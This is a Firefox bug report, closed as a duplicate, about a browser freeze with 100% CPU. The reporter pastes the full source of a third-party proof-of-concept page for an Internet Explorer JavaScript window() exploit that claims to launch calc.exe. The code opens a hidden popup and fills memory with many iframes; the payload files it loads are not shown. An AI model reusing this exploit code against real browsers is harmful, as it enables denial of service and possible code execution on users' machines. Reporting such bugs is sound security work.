Closed Bug 318668 Opened 16 years ago Closed 16 years ago

Firefox get FREEZE and error "Not responding..." with CPU usage in 100% with a code JavaScript (demonstrated here)

Categories

(Toolkit Graveyard :: Error Console, defect)

x86
Windows XP
defect
Not set
critical

Tracking

(Not tracked)

RESOLVED DUPLICATE of bug 317334

People

(Reporter: rftoken, Unassigned)

References

()

Details

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5

I visited this site http://www.computerterrorism.com/research/ie/poc.htm than contains a exemple of malfunctions javascript for IE, but this code also freeze and stop Firefox's application.
- Freeze all windows opened of Firefox 1.5
- Computer stay VERY VERY slow (Monitor of CPU Usage is 100%)
- All windows of Firefox in "Not responding..."
- Soluction is I've to press CTRL+ALT+DEL to finalize this process (and all windows are closed too)

My system: Windows XP Pro SP2

This is the source code.
<html>

<head>
<meta http-equiv="Content-Language" content="en-gb">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Computer Terrorism - Microsoft Internet Explorer Proof of Concept</title>
<script type="text/javascript">

function runpoc(iframecount)
{

document.getElementById('table1').rows[2].cells[0].innerHTML="<p align=center><B><font color=#339966 size=1 face=Arial>&nbsp;&nbsp;&nbsp;&nbsp;loading, please wait....</font></p>"
document.getElementById('table1').rows[4].cells[0].innerHTML=""
document.getElementById('table1').rows[6].cells[0].innerHTML=""
document.getElementById('table1').rows[7].cells[0].innerHTML=""
document.getElementById('table1').rows[9].cells[0].innerHTML=""

 
top.consoleRef = open('http://www.computerterrorism.com/ie/blankWindow.htm','BlankWindow',
  'width=1,height=1'
  +',menubar=0'
  +',toolbar=1'
  +',status=0'
  +',scrollbars=0'
  +',left=1'
  +',top=1'
  +',resizable=0')

top.consoleRef.blur();

top.consoleRef.document.writeln(
  '<html>'
   +'<head>'
   +'<title>CT</title>'
   +'</head>'
   +'<body onBlur=self.blur()>'
   +'</body></html>'
 )

self.focus() // Ensure the javascript prompt boxes are hidden in the background


for (i=1 ; i <=iframecount ; i++)
{ 
top.consoleRef.document.writeln('<iframe width=1 height=1 border=0 frameborder=0 src=fillmem.htm></iframe>')
}

if( iframecount == 8 ){
//alert('8');
top.consoleRef.document.writeln('<iframe width=1 height=1 border=0 frameborder=0 src=bug2k.htm></iframe>')
}

if( iframecount == 4 ){
//alert('4');
top.consoleRef.document.writeln('<iframe width=1 height=1 border=0 frameborder=0 src=bug.htm></iframe>')
}

//+'<iframe width=1 height=1 border=0 frameborder=0 src=bug.htm></iframe>'
//)



}
</script>
</head>

<body onLoad="self.moveTo(0,0);self.resizeTo(screen.width,screen.height);">

<p>&nbsp;</p>
<p>&nbsp;</p>

<table border="0" width="100%" id="table1">
	<tr>
		<td>
		<p align="center">
		<a href="http://www.computerterrorism.com?1">
		<img border="0" src="ctlogo.png" width="270" height="57"></a></p>
		<p align="center"><font color="#333333"><b><font size="1" face="Arial">Microsoft Internet Explorer
JavaScript Window</font></b><font size="1" face="Verdana">()</font><b><font size="1" face="Arial"> 
		Proof of Concept</font></b></font></td>

	</tr>
	<tr>
		<td width="98%" height="22">
		&nbsp;</td>
	</tr>
	<tr>
		<td width="98%" height="22">
		<p align="center"><b><font face="Arial" size="1" color="#339966">The 
		following Proof of Concept is provided exclusively for educational&nbsp;purposes 
		<br>

		only, and is subject to our standard website <u>
		<a href="http://www.computerterrorism.com/termsandconditions.htm">
		<font color="#339966">Terms and Conditions</font></a></u> of use.</font></b></td>
	</tr>
	<tr>
		<td width="98%" height="15">&nbsp;</td>
	</tr>

	<tr>
		<td width="98%" height="15">
		<p align="center"><b><font face="Arial" size="1" color="#333333">Select 
		your operating system:-</font></b></td>
	</tr>
	<tr>
		<td width="98%" height="10"></td>
	</tr>
	<tr>

		<td width="98%" height="27" align="center">
		<p><b><font color="#339966" size="1" face="Arial">
		-</font><font color="#333333"><font color="#333333" size="1" face="Arial"> </font> </font><font color="#333333" size="1" face="Arial"><a href="#" onclick="javascript:runpoc(4)">
		<span style="text-decoration: none"><font color="#333333">Microsoft 
		Windows XP (All Service Packs)</font></span></a><font color="#333333"> </font></font>
		<font color="#339966" size="1" face="Arial"> -</font></b></td>

	</tr>
	<tr>
		<td width="98%" height="22" align="center">
		<p><b><font color="#339966" size="1" face="Arial">
		-</font><font color="#333333"><font color="#333333" size="1" face="Arial"> </font> </font><font color="#333333" size="1" face="Arial"><a href="#" onclick="javascript:runpoc(8)">
		<span style="text-decoration: none"><font color="#333333">Microsoft 
		Windows 2000/Universal (Slower)</font></span></a><font color="#333333"> </font></font>

		<font color="#339966" size="1" face="Arial"> -</font></b></td>
	</tr>
	<tr>
		<td width="98%" height="15" align="center">
		</td>
	</tr>
	<tr>
		<td width="98%" height="15" align="center">

		<b><font color="#339966" face="Arial" size="1">invokes calc.exe if 
		successful <br>
		<font color="#339966"><span style="text-decoration: none">
		<a href="http://www.computerterrorism.com/research/ie/ct21-11-2005.htm">
		<font color="#339966"><span style="text-decoration: none">(Read the full 
		advisory here)</span></font></a></span></font></font></b></td>
	</tr>
</table>

<p>&nbsp;</p>

</body>

</html>

Reproducible: Always

Steps to Reproduce:
1. Executing a JavaScript code from website with Firefox
2. One exemple here http://www.computerterrorism.com/research/ie/poc.htm
3. In this site, click in " -   Microsoft Windows XP (All Service Packs)   - "


Actual Results:  
The computer stay SLOW , firefox freeze and get "Not responding..." message, cpu is 100% loaded, all instances of firefox should be finalized just with that forced command (CTRL ATL DEL)

Expected Results:  
After firefox.exe process is finalized, the computer back NORMAL state. (but I lose personal informations)

*** This bug has been marked as a duplicate of 317334 ***
Status: UNCONFIRMED → RESOLVED
Closed: 16 years ago
Resolution: --- → DUPLICATE
Product: Firefox → Toolkit
Product: Toolkit → Toolkit Graveyard
You need to log in before you can comment on or make changes to this bug.